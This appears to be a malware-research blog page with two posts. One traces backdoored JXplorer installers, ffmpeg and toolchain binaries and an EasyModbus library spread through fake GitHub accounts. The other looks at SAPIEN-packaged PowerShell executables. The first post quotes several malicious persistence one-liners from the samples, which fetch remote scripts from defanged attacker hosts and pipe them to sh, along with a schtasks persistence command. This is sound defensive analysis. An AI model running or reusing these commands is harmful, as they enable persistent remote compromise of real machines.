dfir it!

The Supreme Backdoor Factory

2019-02-26T17:53:15+01:00

Recently I was playing with VirusTotal Intelligence and while testing some dynamic behavior queries I stumbled upon this strange PE binary (MD5: 7fce12d2cc785f7066f86314836c95ec). The file claimed to be an installer for the JXplorer 3.3.1.2, a Java-based “cross platform LDAP browser and editor” as indicated on its official web page. Why was it strange? Mostly because I did not expect an installer for a quite popular LDAP browser to create a scheduled task in order to download and execute PowerShell code from a subdomain hosted by free dynamic DNS provider:

I initially planned to keep this write-up short and focus on dissecting suspicious JXplorer binary. However, analyzing the JXplorer binary turned out to be only the first step into the world of backdoored software.

JXplorer

In order to validate my VirusTotal finding I downloaded a matching version of Windows installer (3.3.1.2) from the official JXplorer SourceForge repository. Unsurprisingly, the MD5 hashes of both files were different. Last thing I wanted to do was to disassemble two 7 megabytes PE binaries so I started with simpler checks in order to locate difference(s). As binaries were packed with UPX, I unpacked them with the upx tool and compared MD5s of PE sections. The sections were all identical, with exception of the resource section. I was not sure how content of the PE resource section could affect behavior of the installer so I used VBinDiff to see the exact difference. The tool actually revealed the following modifications:

The manifest file located in the resource section, specifically the requestedExecutionLevel property. The original file required Administrator privileges (requireAdministrator) while the modified was fine with running with caller’s privilege level
Additional newline character appended to the file - explaining 1 byte size difference between the files
A relatively small (3230 bytes) blob of what seemed to be ZLIB compressed data at offset 0x4be095. Note the clear text file names just before the ZLIB header (http-2.7.9.tm, platform-1.0.10.tm):

The first two differences did not seem to be important so I focused on the last one. The identified ZLIB data was placed in the PE file overlay space and I figured that it was likely part of an archive used by the installer to store JXplorer files. Fortunately, JXplorer web page mentioned that JXplorer was using the BitRock Install Builder and after short search I managed to find the following Tcl unpacker for BitRock archives: bitrock-unpacker.

Once I installed the ActiveTcl and downloaded required SDX file I used the bitrock-unpacker script to unpack JXplorer installation files from both installers. Then I used the WinMerge tool to compare resulting files and directories. To my surprise there were no differences which meant that JXplorer application files were left intact. That also meant that I needed to dig a bit further.

After going through bitrock-unpacker code I noticed that it first mounted the Metakit database in order to extract installer files that were used to locate and extract the Cookfs archive storing JXplorer files. Using existing bitrock-unpacker code I created this Tcl script to dump all installer files from the Metakit database to disk. This time comparing BitRock installer files yielded interesting results.

WinMerge showed one difference - a file named http-2.7.9.tm, located in the \lib\tcl8\8.4\ directory.

Despite having the same size and timestamps (atime, ctime, mtime as extracted from the Cookfs archive) the file http-2.7.9.tm (MD5: f6648f7e7a4e688f0792ed5a88a843d9, VT) extracted from the modified installer did not remind standard http.tcl module. Instead it contained exactly what I was looking for:

Below is the summary of actions performed by the http-2.7.9.tm script:

Create a scheduled task named Notification Push to download and execute PowerShell code from hxxp://svf.duckdns[.]org
Write a JAR file (MD5: 9d4aeb737179995a397d675f41e5f97f, VT) to %TEMP%\..\Microsoft\ExplorerSync.db. Create a scheduled task ExplorerSync to execute ExplorerSync.db
Write a JAR file (MD5: 533ac97f44b4aea1a35481d963cc9106, VT) to %TEMP%\BK.jar and execute it with the following command line parameters: hxxp://coppingfun[.]ml/blazebot %USERPROFILE%\Desktop\sup-bot.jar
Execute additional JAR file downloaded in the previous step
ping a legitimate domain supremenewyork[.]com

Some of the actions were a bit odd to me (Why would you drop malware(?) to user’s Desktop? Why would you choose that specific domain supremenewyork[.]com?). That got me thinking that I might be dealing with a testing version of modified installer. The names of files (blazebot, sup-bot) did not ring any bells either so I decided to do a bit of online research.

Blazebot

One of the top Google search results for the keyword blazebot was this YouTube video created by Stein Sørnson and titled Blaze Bot Supreme NYC. The video presented a process of downloading, running and configuring what seemed to be a Java-based sneaker bot (TIL!) called blazebot / Supreme NYC Blaze Bot. Both the YouTube video content and its description referenced a source from which one can download blazebot: a GitHub repository steisn/blazebot [Wayback Machine copy]. Git commit messages for that repository contained following author entries: Stein Sørnson (sample commit message) suggesting that Stein Sørnson was the owner of both YouTube channel and GitHub repository.

With such unique name it was not hard to find another online account related to Stein Sørnson, this time on SourceForge - allare778 [Wayback Machine]. While the username was set to allare778 the full name was present in the profile page title:

The allare778 account owned three projects:

supremebot [Wayback Machine copy], which referenced previously discussed YouTube video and hosted multiple files, including supremebot.jar (MD5: 2098d71cd1504c8be229f1f8feaa878b, VT), exactly the same file that was also present in the blazebot GitHub repository (as blazebot-1.02.11.jar)
elitesubot [Wayback Machine copy], which was empty and did not list any past activity
allesare [Wayback Machine copy], which also did not contain any files; however, it listed project activity, including names of previously uploaded files:

There was also one additional detail concerning blazebot that started to make sense to me much later. While back then I did not have many reasons to analyze that sneaker bot I took a quick look at decompiled Java classes. The bot contained an update functionality that downloaded AES encrypted and RSA signed “update instructions” file from the other project repository belonging to the user allare778:

hxxp://allesare.sourceforge[.]net/en-us/bver

The implementation of update mechanism seemed to allow project owner to execute arbitrary system commands on hosts running blazebot.

At that point I thought that the connection between modified JXplorer installer and the “Supreme NYC Blaze Bot” could be just coincidental. I took a step back and analyzed two JAR files extracted from the http-2.7.9.tm Tcl script hoping that they will provide further clues.

JDL and FEN

This was a quick exercise as both JAR files turned out to contain compact downloaders/loaders. The BK.jar file (MD5: 533ac97f44b4aea1a35481d963cc9106, VT) contained the jdl package implementing simple downloader. It was responsible for downloading data from URL provided as a first command line argument and then saving it to a file provided as a second command line argument.

The second JAR file ExplorerSync.db (MD5: 9d4aeb737179995a397d675f41e5f97f, VT) was more interesting as it contained two hardcoded URLs. The fen package implemented an infinite loop trying to download and invoke Java code (from the fmb package) from the following two URLs:

hxxp://ecc.freeddns[.]org/data.txt
hxxp://san.strangled[.]net/stat

While the san.strangled[.]net did not have resolution at the time of analysis, the ecc.freeddns[.]org DNS A record pointed to 207.38.69[.]206, an IP address hosting Dynu’s web redirect service. The ecc.freeddns[.]org was set to redirect HTTP requests to jessicacheshire.users.sourceforge[.]net and fortunately the data.txt file was still present there.

FEimea Portable App

As expected the data.txt (MD5: 65579b8ed47ca163fae2b3dffd8b4d5a, VT) was a yet another JAR file. Going through decompiled code it was quite evident that code implemented functionality typical for a RAT. This is by no means a complete analysis of the code (there is much more ahead of us!) but I made following observations while skimming through the code:

The tool identified itself as FEimea Portable App - ver. 3.11.2 Mainline. It also returned following version strings: Audio system : (none), Audio codecs : (none) while it did not seem to implement any audio related functionality
It supported following set of commands: ACCESS, APPEND, BYE, COPY, DOWNLOAD, FETCH, HASH, LIST, LOGOUT, NOOP, PWD, REMOVE, RENAME, SELECT, STAT, VERSION
It seemed to use embedded RSA modulus and public exponent to encrypt and decrypt network communication with two hardcoded command and control servers: limons.duckdns[.]org (TCP/13057) and polarbear.freeddns[.]org (TCP/7003)
Additionally it reported ROT13 encoded username, operating system type and architecture to the following URL: hxxp://utelemetrics.atwebpages[.]com/update.php?tag=
It also had capability of invoking Java code obtained from the hardcoded URL: hxxp://ecc.freeddns[.]org/a2s.txt (not available at the time of analysis)
Interestingly it also implemented a very specific function to extract user name value from the .gitconfig file located in user’s home directory

At that point I ran out of files to analyze but at the same time suspected that with the existence of the FEimea Portable App there is likely much more to this story than just someone playing with the JXplorer installer. I made an assumption that while I might have stumbled upon a testing version of the modified installer there might be other versions floating around. I also expected that some distribution channel for modified installer must exist.

JXplorer: Part Deux

I set out for a hunt. I downloaded latest Windows version (3.3.1.2) of the JXplorer installer from its official website and I compared MD5 hash with installer file hosted on the official GitHub repository pegacat/jxplorer. They were the same (MD5: c23a27b06281cfa93641fdbb611c33ff). I did the same with JXplorer installer files downloaded from multiple software hosting websites. Same results. I repeated the process with files grabbed from SourceForge mirrors. All good. Then I searched for JXplorer on GitHub:

If not the number of stars assigned to the repositories I would probably have ignored the results. How come the official JXplorer GitHub repository (pegacat/jxplorer) had 39 stars while the next one (serkovs/jxplorer [Wayback Machine copy]) had twice as many? The difference was even more striking with subscribers of each repository (11 vs 66). What was also strange the serkovs/jxplorer was not even a clone of the official JXplorer repository and it only contained a single file - Linux installer for the JXplorer 3.3.1.2:

I downloaded Linux installer (32 bit ELF binary) from both repositories and compared the files. Just by looking and their sizes I knew they were different. The original Linux installer file jxplorer-3.3.1.2-linux-installer.run (MD5: 0c00fd22c65932ba9ce58b4ba6107cf0, VT) was 7679495 bytes long, while the one downloaded from serkovs/jxplorer (MD5: 0489493aeb26b6772bf3653aedf75d2a, VT) was a bit larger (7954444 bytes).

Both files were generated by BitRock Install Builder, the same tool that was used to create Windows version of the installer. I knew the drill and immediately used bitrock-unpacker to extract JXplorer software files and then compared them. There were no differences. Next I extracted BitRock installer files - again files were identical so I decided to further inspect the binary downloaded from the serkovs/jxplorer repository. While skimming through the binary in hex editor I noticed strings characteristic for the UPX packer however my attempt to unpack it with the upx tool was unsuccessful and I got the not packed by UPX error. After a while I realized that the file lacked usual UPX magic values (UPX!) which were replaced by the following string: L1ma. Fortunately upx was able to unpack the file after I replaced all occurrences of L1ma with the original value of UPX!.

Once I had the unpacked file (MD5: 25c47cf531e913cb4a59b2237ab85963, VT) I spent some time reverse-engineering it and eventually I found a suspicious function that started with decrypting 704 bytes of data (located at file offset 0x92040) using 256 bytes long XOR key (located at file offset 0x66700). The decrypted data contained 15 null-terminated strings. The ultimate goal of the code was to establish persistence and to execute the following command:

/bin/sh -c 'while true;do wget hxxp://yzyaio.onlinewebshop[.]net/act/stat.php?info=SLADE -O -|sh;sleep 60;done>/dev/null 2>&1'

The code followed two main paths, depending on privileges it was executed with. When ran with root privileges the code would perform following actions:

Create a new systemd service rpc-statd-sync (with the following description: Sync NFS peers due to a restart) to execute above one-liner
Establish additional persistence for every user in the system by creating a desktop entry (~/.config/autostart/.desktop) to execute above one-liner

Without root privileges the code resorted only to infecting current user.

While modified software was rather specific, at that stage I did not have any proof that the same entity was behind modification of both (Linux and Windows) JXplorer installers. I was also very curious what else I can find on GitHub.

The Power of Social Graph

I started going through GitHub accounts that starred or subscribed the repository serkovs/jxplorer and I quickly noticed patterns:

Accounts seemed to be created in multiple batches, on specific dates, as if the process was automated
Accounts created on 2018-03-04 did not have any content and were simply used to star 41 other repositories
Accounts created at earlier dates (February 2018) were used both to host a single repository and to increase authenticity of other repositories by starring and subscribing them

There were additional similarities among accounts that hosted repositories:

Each account hosted a single repository with a history of one or two commits
The author field in the Git commit messages indicated consistent usage of free Slovakian email service pobox[.]sk , with username often corresponding to the one used on GitHub (sample commit message)
Timestamps present in the Git commit messages consistently indicated CET time zone
Commit messages tended to be consistent among different accounts and repositories, e.g. erroneous message “2st commit” appeared in different repositories belonging to different accounts: aurelrybar/editbox [Wayback Machine copy], henrichjahoda/ardublock [Wayback Machine copy]
Commits seemed to be automated and occurred at specific times among different accounts and repositories, e.g. gabrieolo/bounceball (2018-04-28 11:11:17), karibanker/eug (2018-04-28 11:11:18), jeanelletobler/gumbo (2018-04-28 11:11:19)
Most repositories hosted a single JAR file, usually a game (gabrieolo/bounceball [Wayback Machine copy]), tool (jelamarucka/pdfjumbler [Wayback Machine copy]) or library (vaclaw281/junit [Wayback Machine copy])

I eventually ended up using GitHub API and Neo4j to collect and analyze metadata associated with suspicious accounts and repositories. Data showed nothing but a confined network of GitHub accounts starring and subscribing each others’ repositories.

As I was limited with time and resources and was not able to analyze each file in each identified repository I resorted to analyzing only a small subset of files. Two of the repositories turned out to contain interesting artifacts that allowed me to draw additional connections and fill existing gaps. Below graph shows “social interactions” between the serkovs account, two other accounts that I analyzed (mansiiqkal and ballory) and a number of related (starred/subscribed) repositories:

The Missing Link

I decided to inspect content of the ballory/ffmpeg [Wayback Machine copy] repository because it did not contain JAR file(s) like most of other identified repositories - instead it had a bunch of Linux binaries, claiming to contain “FFmpeg Linux Build (64 bit)”. Additionally, the repository stood out as it did not have as many stars and subscribers as others (only 14) however the owner (ballory) starred and subscribed at least 60 other repositories according to the collected data.

The readme.txt file present in the repository directly linked to www.johnvansickle.com/ffmpeg/, a website hosting static ffmpeg builds for Linux. In fact, file names and directory structure matched sample build I downloaded from there. I did not find that exact build (ffmpeg-git-20180427-64bit-static.tar.xz listed in the readme.txt file) on www.johnvansickle.com so I was not able to compare files.

When I started analyzing the ffmpeg 64 bit ELF binary (MD5: c78ccfc45bfba703cce0fc0c75c0f6af, VT) I immediately noticed suspicious code right at the entry point. The code was responsible for mapping the binary via /proc/self/exe and then jumping to a specific offset, 624 bytes from the end of the file. After dumping and disassembling shellcode occupying last 624 bytes of the binary I was left with a short decryption loop (XOR 0x37, SUB 0x2e) and encrypted data. The decrypted data contained shellcode responsible for forking and executing following command in the child process via execve syscall:

/bin/sh -c 'cd /home/`whoami`/.config&&mkdir -p autostart&&cd autostart&&echo [Desktop Entry]>y&&echo Type=Application>>y&&echo Exec=/bin/sh -c "'while true;do wget hxxp://allesare.sourceforge[.]net/en-us/m -O -|sh;sleep 60;done'">>y&&chmod 755 y&&mv y .desktop'

That was exactly what I was looking for. The allesare SourceForge project was owned by the account named allare778 (Stein Sørnson), and this finding created plausible link between the GitHub user ballory and that account.

Remaining part of the code was supposed to run in the parent process and was responsible for decrypting (XOR 0x11, SUB 0x31) 162 bytes of data located 786 bytes from the end of the file and jumping to it. The decrypted data seemed to contain original entry point function.

The other analyzed binaries from the repository (ffmpeg-10bit (MD5: 6d5bea9bfe014fc737977e006692ebf3, VT), ffprobe (MD5: 98f8600ff072625fd8ff6b3e14675648, VT), qt-faststart (MD5: e9b58b1e173734b836ed4b74184c320b, VT)) contained same pieces of shellcode, located at the same offsets from the end of files and used the same decryption routines. The only small differences were in the hardcoded offsets.

The Even More Missing Link

The second repository that yielded interesting results was mansiiqkal/easymodbustcp-udp-java [Wayback Machine copy]. The repository was starred and subscribed by both serkovs and ballory accounts. The description (Easy Modbus TCP/UDP/RTU) and the file name (EasyModbusJava.jar) suggested that it contained the EasyModbus Java library.

I downloaded the most recent version (2.8, released on 2017-03-14) of EasyModbusJava.jar (MD5: 56668c3915a0aa621d7f07aa11f7c8a9, VT) from the official EasyModbus project page and compared it with EasyModbusJava.jar (MD5: 4d18388a9b351907be4a9f91785c9997, VT) from mansiiqkal/easymodbustcp-udp-java.

There was no doubt about it, files were different. I used the zipinfo to list archives’ files and metadata. The JAR from mansiiqkal/easymodbustcp-udp-java was a bit larger (97272 vs 114504 bytes), included one additional file (INumberOfConnectedClientsChangedDelegator1.class) and according to timestamps was (re)packaged at 2018-03-22 18:29:58 (which in turn correlated with timestamp present in this Git commit message).

To be sure these were the only differences I used Jd-Gui to save decompiled Java classes from both JARs and then used WinMerge to see differences. Skipping negligible code formatting artifacts generated by the decompiler here is what I found:

The extra file de/re/easymodbus/server/INumberOfConnectedClientsChangedDelegator1.class contained three large byte arrays and what seemed to be a decryption function
12 other classes explicitly imported the INumberOfConnectedClientsChangedDelegator1 class

The code present in the INumberOfConnectedClientsChangedDelegator1 class was designed to drop files to disk and establish persistence. The code used a custom decryption routine to decrypt an array of bytes and then used resulting blob (3011 bytes in total, MD5: cf2ca657816af534c07c8ceca167e25b, VT) as a source of file content and strings (file names, system commands).

Depending on the operating system type the code was executed on, it performed different actions described below:

Linux

The code dropped a JAR file (MD5: 9d4aeb737179995a397d675f41e5f97f) to $HOME/.local/share/bbauto and created a desktop entry persistence by setting $HOME/.config/autostart/none.desktop file to execute the following command:

/bin/sh -c "java -jar $HOME/.local/share/bbauto"

The code also created an additional desktop entry $HOME/.config/autostart/.desktop set it to execute the following command:

/bin/sh -c 'while true;do wget hxxp://eln.duckdns[.]org/se -O -|sh;sleep 60;done'

macOS

The code dropped a JAR file (MD5: 9d4aeb737179995a397d675f41e5f97f) to $HOME/Library/LaunchAgents/AutoUpdater.dat and established persistence by creating a launch agent called AutoUpdater ($HOME/Library/LaunchAgents/AutoUpdater.plist).

The code also created an additional launch agent called SoftwareSync set to execute the following command:

/bin/sh -c 'while true;do curl hxxp://eln.duckdns[.]org/se -o -|sh;sleep 60;done'

Windows

The code dropped a JAR file (MD5: 9d4aeb737179995a397d675f41e5f97f) to %temp%\..\Microsoft\ExplorerSync.db and established persistence by executing following command:

schtasks /create /tn ExplorerSync /tr "javaw -jar %temp%\..\Microsoft\ExplorerSync.db" /sc MINUTE /f

The dropped JAR file (MD5: 9d4aeb737179995a397d675f41e5f97f) and Windows file and scheduled task names (ExplorerSync.db, ExplorerSync) were exactly the same as discovered in the modified JXplorer Tcl installer script. This created another plausible connection between the mansiiqkal/easymodbustcp-udp-java repository and modified Windows installer of JXplorer.

I also analyzed previous version of the EasyModbusJava.jar (MD5: 38f51f6555eba1f559b04e1311deee35, VT) file committed to the mansiiqkal/easymodbustcp-udp-java repository on 2018-02-20. It contained the same additional Java class however code was a bit different due to changes in an encrypted array and offsets referencing decrypted data. When decrypted the blob (3011 bytes long, MD5: 9a3936c820c88a16e22aaeb11b5ea0e7, VT) contained mostly the same data as later version. The only notable difference was usage of %APPDATA% instead of %TEMP% as a base directory for location of dropped JAR file on a Windows systems.

Summary

By following breadcrumbs I was able to discover and draw connections between pieces of malware and online infrastructure:

The modified JXplorer Windows installer found on VirusTotal and modified EasyModbus Java library found on GitHub (mansiiqkal/easymodbustcp-udp-java) dropped the same JAR file (FEN downloader, MD5: 9d4aeb737179995a397d675f41e5f97f). Further similarities were visible in the dropped file path (%TEMP%\..\Microsoft\ExplorerSync.db) and scheduled task name (ExplorerSync)
GitHub account mansiiqkal was part of the same “social circle” as other GitHub accounts: ballory and serkovs, among others. The accounts were linked by starring and subscribing to the same, confined set of GitHub repositories, including each other’s repositories
GitHub account ballory created the ballory/ffmpeg repository containing modified version of ffmpeg tools. Malicious code present in these tools was set to download a file from the following SourceForge project URL hxxp://allesare.sourceforge[.]net/. The project was owned by an account named allare778 (Stein Sørnson). The same account owned another project named supremebot, hosting a sneaker bot with the same name (and described as “Supreme New York Bot”)
The supremebot.jar file (MD5: 2098d71cd1504c8be229f1f8feaa878b) hosted by the SourceForge supremebot project was also present in the steisn/blazebot GitHub repository belonging to the account steisn (Stein Sørnson). Additionally the YouTube account Stein Sørnson hosted a video about “Blaze Bot Supreme NYC”. Coincidentally, the malicious code present in the modified JXplorer Windows installer referenced “blazebot” and supremenewyork[.]com
GitHub account serkovs created the serkovs/jxplorer repository containing modified JXplorer Linux installer file. While the malicious code present in the binary did not reference any previously observed infrastructure both modified JXplorer installers (for Windows and Linux) could be connected by following linked GitHub accounts (see point 1.)

Is this the end?

Let’s find out! Following up on specific indicators found in analyzed files and collected metadata about GitHub repositories I was able to discover additional related pieces of malicious code.

I started with VirusTotal hunting capabilities - the search returned a set of binaries belonging to the same malware family: Eimea Lite App. The functionality and supported commands of this malware seems to be closely tied with previously discussed FEimea Portable App. The main difference is that while FEimea Portable App is written in Java, the Eimea Lite App comes in the form of compiled binaries for both Windows and Linux operating systems. Each observed instance of Eimea Lite App was built into the LAME encoder tool, likely in order to thwart detection.

One of the oldest samples uploaded to VirusTotal on 2017-08-26 was (unsurprisingly) named supreme_bot2.cpl (MD5: 815db0de2c6a610797c6735511eaaaf9, VT). The sample uses two command and control servers: sanemarine.duckdns[.]org, lemonade.freeddns[.]org; contains two self signed certificates issued for Allesare Ltd. and supports similar set of commands as Java based FEimea Portable App:

CAPABILITY EIAPrev1.33 EAUTH SELECT EXAMINE STATUS PWD LIST STAT SEARCH ESEARCH RENAME HASH FETCH COPY APPEND LINK SYMLINK REMOVE ACCESS NOOP LOGOUT

The most recent sample Aero.cpl (MD5: dd3a38ee6b5b6340acd3bb8099f928a8, VT) was uploaded to VirusTotal on 2018-11-25, which correlates with version string present in the file:

Eimea Lite app - ver. 3.11  Mainline
Audio system : IMM Framework
Audio codecs : pcm lame-mp3 opencore-amrnb soxr
Build Nov 25 2018 11:54:25  Win32

This instance uses the same command and control servers that were observed in initially analyzed sample of the FEimea Portable App (MD5: 65579b8ed47ca163fae2b3dffd8b4d5a): limons.duckdns[.]org and polarbear.freeddns[.]org.

My other search focused on further exploration of the GitHub graph. I previously mentioned that suspicious GitHub accounts and repositories created a confined network - however the graph also included entries that seemed to be a bit off.

One of these entries was an account of Andrew Dunkins (adunkins [Wayback Machine copy]), that included a set of nine repositories, each hosting Linux cross compilation tools. Each repository was watched or starred by several already known suspicious accounts.

The account seemed to be legitimate at first sight - it included a profile picture and description, which was not consistent with previously discovered accounts. However a look at a sample ELF binary (i686-w64-mingw32-addr2line, MD5: b54156221d1c5387b8de0eb4605dc3a0, VT) hosted in one of the repositories quickly proved I was wrong. At the end of the binary there was a shellcode, almost identical to the one found in the ffmpeg binaries obtained from the ballory/ffmpeg repository. The only difference was that shellcode was set to execute the following command:

/bin/sh -c cd /home/`whoami`/.config;mkdir autostart;cd autostart;>y echo [Desktop Entry];>>y echo Type=Application;>>y echo Exec=/bin/sh -c "'while true;do wget hxxp://allesare.sourceforge[.]net/test/msg -O -|sh;sleep 60;done'";chmod 755 y;mv y .desktop

Overall there were 305 backdoored ELF binaries in nine GitHub repositories belonging to Andrew Dunkins.

Following that trail I found one additional account (snacknroll11) that starred some of Andrew Dunkins’ repositories and that contained a repository with interesting name and description (streettalk_priv_bot - Supreme Bot [Wayback Machine copy]).

Despite the name and description of the binary, the file included in that repository (supremebot.exe) turned out to be something else - something that I have seen previously and something that provided a great closure for this post.

The file supremebot.exe (MD5: 6ee28018e7d31aef0b4fd6940dff1d0a, VT) was actually another modified version of JXplorer 3.3.1.2 installer for Windows. The installer also contained changed http-2.7.9.tm file (MD5: 3a75c6b9b8452587b9e809aaaf2ee8c4, VT) however some actions performed by the Tcl script were slightly different from the initially analyzed version:

It used BITSAdmin and PowerShell to download and execute a batch script from hxxp://enl.duckdns[.]org
It dropped a JAR file (MD5: d7c4a1d4f75045a2a1e324ae5114ea17, VT) to BR.jar. The JAR file was another version of previously described JDL downloader

So is this the end? I don’t think so :-)

Appendix

Please note that GitHub has now removed identified accounts and repositories. Copies of the repositories showing their content are available via Wayback Machine. Where possible I included links to Wayback Machine copies in the above post.

List of GitHub accounts

List of GitHub repositories

List of indicators

Down the rabbit hole with packaged PowerShell scripts

2018-05-08T16:55:39+02:00

Several weeks ago, during one of the investigations, I needed to triage a few potentially malicious Windows executables. One of them caught my attention - a .NET binary located in a seemingly legitimate subdirectory under Program Files. At the same time the file was obfuscated (based on a quick look at FLOSS output) and according to VirusTotal it was detected as “potentially malicious” by several antivirus products. Well, I thought, even if the file turns out to be non-malicious, there must be a reason for it to be obfuscated. Oh boy, how little did I know…

(Re)discovery

I opened the file in dnSpy and immediately encountered first obstacle - code was obfuscated with SmartAssembly. Fortunately, de4dot did all the dirty work for me and within seconds I was left with a compact code consisting of several classes. I quickly located main part of the program and realized that I am likely dealing with some kind of loader – part of the code was responsible for reading, decrypting and parsing data from two RT_RCDATA resources.

After poking around a little bit more I found a method that was responsible for creating a new PowerShell runspace and executing PowerShell code retrieved from a previously decrypted resource. I was aware of the tools like p0wnedShell making use of exactly same method to “execute PowerShell code without running powershell.exe” so I thought that I am finally onto something.

At this stage, I just wanted to get my hands on a decrypted PowerShell code as fast as possible. Using CFF Explorer I exported RT_RCDATA resource content to a file. Then I copied C# code responsible for decryption from dnSpy window and pasted it to LINQPad. I also needed to make a few small adjustments to the original code to read the content of the resource from a file and pass it to decryption function.

The code worked well but what I got back was not exactly what I expected. It was still a PowerShell code but it did not look like Invoke-Mimikatz or other offensive module that I knew of. Instead, I was looking at a rather ordinary script written by someone to manage software and patch installation on the workstations. All that effort for nothing? What a disappointment!

One last thing I wanted to figure out was the reason why someone made an effort to package a simple PowerShell script in this way. Was it a custom made packer? Or maybe the file was generated by some tool that I was not aware of?

I took a bunch of unique strings from the analyzed binary and fired up my favorite search engine. I quickly realized that analyzed binary was likely generated using SAPIEN Script Packager - available in products like PowerShell Studio or PrimalScript. Following this path I also found out that I was not the only one to encounter scripts packaged this way:

Back in 2012 @mattifestation presented how to dynamically extract script content from binaries generated by SAPIEN PrimalScript
Last year @RemkoWeijnen released ExeToPosh - a tool to statically extract script content from binaries created by SAPIEN PowerShell Studio

That’s all sorted out then, my investigation was over – or maybe not?

Nothing is lost…

Judging by the fair amount of posts on the SAPIEN Forums their products seem to be quite popular among developers and administrators. Following my “failed” investigation I started wondering if they are also popular among malware creators? Let’s take a brief look at some of the SAPIEN Script Packager capabilities:

It allows PowerShell script to be encrypted, embedded into executable as a resource and later executed within PowerShell runspace (do you recall p0wnedShell?)
Generated executable can enforce execution restrictions and allow embedded script to be executed only by defined users or on hosts with specified hostnames, assigned MAC addresses or AD domains
Packages generated with newer versions of PowerShell Studio or PrimalScript can stop execution when PowerShell Script Block logging is enabled or disable it for the time of execution. Since version 5.4.144 of PowerShell Studio also Transcription logging can be disabled
Packaged script can be also executed within the security context of another user (by using “Alternate credentials” option). “When selecting RunAs or Impersonation, the specified credentials are stored inside the packaged executable. They are of course stored encrypted.” - we’ll get back to this later

On top of that, the SAPIEN PrimalScript script packager supports many more “engines”, allowing users to package not only PowerShell scripts but also:

VBScript and JScript (via WScript/CScript)
HTA (via MSHTA)
CMD and Batch (via CMD)
Windows Script Host scripts

Game Plan

After learning about all these features I was almost sure that there must be some malicious PowerShell scripts packaged this way (spoiler: I was not wrong). I came up with this simple plan:

Collect as many samples as possible
Use ExeToPosh to extract scripts
Analyze extracted scripts

First step went smoothly thanks to Malware Hunting capabilities offered by VirusTotal. I initially created a really basic YARA rule for Retrohunt which resulted in approximately 230 samples and additionally gave me steady influx of 1-3 samples per day when applied to newly uploaded files.

Initial YARA rule used to match executables generated by SAPIEN Script Packager

rule sapien
{
    strings:
        $sapien = "SAPIEN PowerShell" wide
        $posh = "PoshExe" ascii
    condition:
        uint16(0) == 0x5A4D and all of them
}

The second step was when things started going south. While ExeToPosh worked really well for some of the collected samples it failed to extract data from the rest of the files. I did not want to reverse SAPIEN’s products (the license explicitly prohibits it anyway) so I ended up analyzing 20 or so samples. After several long evenings I knew exactly what was wrong. The files were generated by a different versions of Script Packager - and while mechanics did not change much between versions it was the small things that made a difference.

Here is what I learned about collected executables generated by SAPIEN’s Script Packager:

Samples were both native PE executables and .NET managed assemblies
Older samples (based on compile timestamp) were not obfuscated. With few exceptions all .NET samples were obfuscated with SmartAssembly
Up to four RT_RCDATA binary resources were included in generated executables:
- Resource ID 1 - “configuration”: stored a binary structure defining runtime settings for the script and the associated files. This resource seemed to be mandatory and was present in every analyzed sample. If “Alternate credentials” option was used credentials were stored in two separate fields: username as clear text string and password blob encrypted with the “configuration key”
- Resource ID 2 - “library files”: stored a structure containing WSC/COM objects. The objects were sometimes compressed (ZIP) before being placed in the structure, finally the whole structure was encrypted with the “data key”. This resource seemed to be optional
- Resource ID 3 - “data files”: stored arbitrary files needed by the script. Data in this resource was organized the same way as “library files”. This resource seemed to be optional
- Resource ID 4 - “script”: stored packaged script. Script was encrypted with the “data key”. Some scripts were also compressed (ZIP) before being encrypted. This resource seemed to be mandatory and was present in every analyzed sample
Majority of analyzed samples implemented two decryption schemes: AES and what was internally called “simple decode”. AES, however, seems to be available only in the “high encryption pack” and I have not seen any sample making any use of it
Decryption key pairs were constant among samples and were included as clear text strings in generated executables. Older samples used following static key pair: foobar and hsdiafwiuera (“configuration key” and “data key” respectively). Newer samples (starting around release of PowerShell Studio 5.4.138) used the following static key pair: 073E77D0D536421AA25BF60B16746B88 and BC373ACA27924EBEA29D2A22E348ACB4
There were at least six different versions of configuration structures - starting with oldest and shortest (800 bytes) and ending with newest and longest (5236 bytes). Each new version introduced new fields or changes in the field format (e.g. character encoding)
Some fields present in the configuration structure were not always used by the loader at runtime. Taking this into account it is not always possible to tell if a given option is used without fully reverse engineering specific sample
Based on additional strings included in extracted scripts, collected samples were created by a range of products: starting with quite dated PrimalScript 2009 and ending with most recent PowerShell Studio 2018 5.5.150 and PrimalScript 2018 7.4.112

In order to facilitate all of the above options and to speed up the analysis of several hundred samples I decided to create my own tool to statically analyze and extract embedded data. You can find the script on Github. It works well for samples that I have collected but taking into account the variety of Script Packager versions and packaging options it may fail miserably in certain situations.

After running all collected samples through my script I ended up with a log file containing more than one million lines of scripts (mostly PowerShell) and metadata.

…Everything is forgotten (Unless you upload it to VirusTotal)

When I started going through extracted data I was a little bit baffled - I expected to find relatively large number of malicious scripts (after all I sourced all samples from VirusTotal). Out of 250 analyzed samples only approximately 20% turned out to be malicious:

45 instances of fontdrvhost.ps1 - a PowerShell downloader and management script for cryptocurrency miners (e.g. Hybrid Analysis, VirusTotal, extracted script). Interestingly majority of samples contained configuration (e.g. proxy servers) for specific AD domains. All collected samples used msupdate[.]info for C2
Test PowerShell Empire stager TrashPayloadMVEC.ps1 (VirusTotal, extracted script)
Test PowerShell Empire stager LabTestHttp.ps1 (VirusTotal, extracted script)
Cobalt Strike Beacon loader amazon_64.ps1 - set to communicate with 144.208.127.168:443 (Censys). It was one of the few observed samples that made use of execution restrictions - in this case only SYSTEM user was allowed to run the script (VirusTotal, extracted script)
PowerShell loader for mimikatz GardeRat.ps1 (VirusTotal, extracted script)
Shellcode loader - likely Cobalt Strike stager set to communicate with 192.10.22.35:443 (VirusTotal, extracted script)

At the time of writing only packaged versions of fontdrvhost.ps1 had a decent amount of AV detections. Rest of the files listed above were ignored by majority of AV engines.

That would be it for malicious scripts. So what made remaining 80% of the extracted files - or rather what interesting data was included there? This part turned out to be a real treasure trove of this small research project. Let’s start with some statistics (based on approximately 210 non-malicious samples):

Only 4 of them were signed
Approximately 40 samples had more than five AV engine detections according to VirusTotal. As far as I can tell this is a threshold where VirusTotal will remove a sample on your request only if you make (false) detections disappear by contacting each AV vendor. This point may be important because:
10 samples made use of the “Alternate credentials” where credentials for RunAs/Impersonate option are placed in the configuration resource. The list of collected credentials included such accounts as: administrator, fulladmin or sccm_services
Another 30 extracted scripts included one or more secrets, for example:
- Numerous invocations of net user and Set-ADAccountPassword including clear text passwords
- Several sets of credentials for FTP accounts
- Several sets of credentials for SQL databases
- Several sets of credentials for SCCM service accounts
- Malwarebytes Premium license keys
- Username and password for outlook.com account
- TeamViewer API tokens
